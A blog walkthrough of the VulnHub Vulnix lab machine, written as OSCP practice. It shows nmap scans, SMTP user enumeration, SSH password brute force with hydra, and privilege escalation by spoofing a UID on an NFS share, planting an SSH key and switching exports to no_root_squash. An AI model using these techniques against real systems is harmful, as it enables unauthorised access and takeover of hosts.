Posted by The machine
This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub
The challenge
The challenge or goal of the machine lists the following:
The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk
https://www.vulnhub.com/entry/hacklab-vulnix,48/
Walk-through
The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.
Information gathering
To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.129.
So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 192.168.21.129 -oA nmap and sudo nmap -sV -sC -p- 192.168.21.129 -oA fullnmap. We use these parameters for;-sV service and version enumeration, -sC is for basic script usage. -p- to do a full port scan.-oA to save all output to a couple different files.
The nmap results are;
kadeeli@Pentest:~$ sudo nmap -sV -sC 192.168.21.129 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:53 EST
Stats: 0:04:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.00% done; ETC: 02:58 (0:00:04 remaining)
Nmap scan report for 192.168.21.129
Host is up (0.00090s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2020-03-04T07:56:49+00:00; +3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3?
|_ssl-date: 2020-03-04T07:56:49+00:00; +2s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 41699/tcp6 mountd
| 100005 1,2,3 42526/tcp mountd
| 100005 1,2,3 54269/udp6 mountd
| 100005 1,2,3 55371/udp mountd
| 100021 1,3,4 33851/tcp nlockmgr
| 100021 1,3,4 37863/udp6 nlockmgr
| 100021 1,3,4 55935/udp nlockmgr
| 100021 1,3,4 58084/tcp6 nlockmgr
| 100024 1 40992/tcp6 status
| 100024 1 47076/tcp status
| 100024 1 53594/udp6 status
| 100024 1 59671/udp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2020-03-04T07:56:49+00:00; +3s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
|_ssl-date: 2020-03-04T07:56:48+00:00; +2s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2020-03-04T07:56:48+00:00; +2s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 00:0C:29:AB:64:0D (VMware)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
33851/tcp open nlockmgr 1-4 (RPC #100021)
40584/tcp open mountd 1-3 (RPC #100005)
41399/tcp open mountd 1-3 (RPC #100005)
42526/tcp open mountd 1-3 (RPC #100005)
47076/tcp open status 1 (RPC #100024)
So we got a decent amount of ports, we got port 22 for SSH, port 25 for SMTP (mailserver), Port 79 finger (No idea what this is), port 110 Pop3 (mailserver), port 111 with some active mounts and port 143 Imap. Then port 512 to 514 for something I dont recognise.
RPC
Lets see what the RPC mount has to offer. We can see the info with rpcinfo -p, but we already got these with nmap. We can see the available mounts with showmount -e 192.168.29.129 and then we can mount it with the mount command.
But we are not allowed to enter this directory:
I tried to make myself nobody but I still got the message permission denied.
SSH
No relevant banner seen ssh 192.168.21.129
SMTP
I had no idea how to test this so I googled some enumeration guides. We can enumerate user with the tool smtp-user-enum which can be installed with apt install. This script can enumerate users. We will use a list of users from seclist. /opt/SecLists/Usernames/xato-net-10-million-usernames.txt. Our command = smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t 192.168.21.129-M VRFY is the attack method-U /opt/…. is the username wordlist-t 192.168.21.129 is the target
We found the following users:
Exploitation
SSH Bruteforce
We got some users. Lets try to bruteforce these with hydra. We use the command hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.129-l user to select the user user-P /usr/share/wordlist/rockyou.txt to select the rockyou wordlistssh://192.168.21.129 to bruteforce the ssh login-t 4 to only give it 4 threads since hydra told me that SSH doesn’t like multiple connection tries normally.
It was running a bit to long so I used the darknet top 100 and top1000 list from the Seclists github repositorie.
Lets try to login with SSH and it worked!
Privilege escalation
I looked around for a while and found that the dovecot service is running as root. But I could not find a exploit or any interesting stuff in the config files.
So after looking around and finding nothing, I thought maybe we have to go back and test the NFS share /home/vulnix. This is the home directory from vulnix. We can get his ID and everything. Maybe we just have to add the vulnix user to our kali machine, use the ID from the /etc/passwd file from the vulnix server and we may have access. And yes we did:
But there is nothing of interest in the directory. Hmm. However I was able to change the permissions of the home directory:
And we got access to the directory on the user user now. But still there is nothing in here. But what if we create a bash script with a SUID bit so that it gives us the shell of the vulnix user? This did not work, no idea why but it didn’t want to work. Probably because it doesn’t work this way with SUID bits.
So I tried the following: 1. Generate SSH keys, 2. Put the public key into the mounted home directory and 3. Login. This went a bit different since I fucked around with the file permissions. But we had to 1. Generate the SSH key, 2. Make a .ssh directory in the mounted folder. 3. Echo the public key into the .ssh directory as the filename authorized_keys and 4. Set the file permissions of .ssh to 700 and authorized keys to 644.
and now we can SSH into the machine:
This user can run the sudoedit command on the /etc/exports file. But what is this file?
So I googled root squats and it gave us a explanation of how we can misuse this. It aswell gave us a example on how to disable this. We can change root_squash to no_root_squash. This can be done with the sudoedit command.
Now we have to restart the vulnix server as described in the post earlier and remount it and then we can probably run our SUID bits /bin/bash? We can remount it with sudo mount 192.168.21.129:/home/vulnix /mnt/user. I didn’t get it to work, I should go back to the machine on a later date since I’m pretty burned.
So after trying again on my own computer, it still didn’t work. I keep getting the message cannot execute binary file after compiling c code or copying my own /bin/bash. So I checked the challenge again and we should get the flag in /root. I could not access this as the vulnix user, but I can make a share with the sudoedit /etc/exports command. So I added the following:
Restarted vunix, mounted the file system and we are in!
However we had to switch to the root user:
Flag
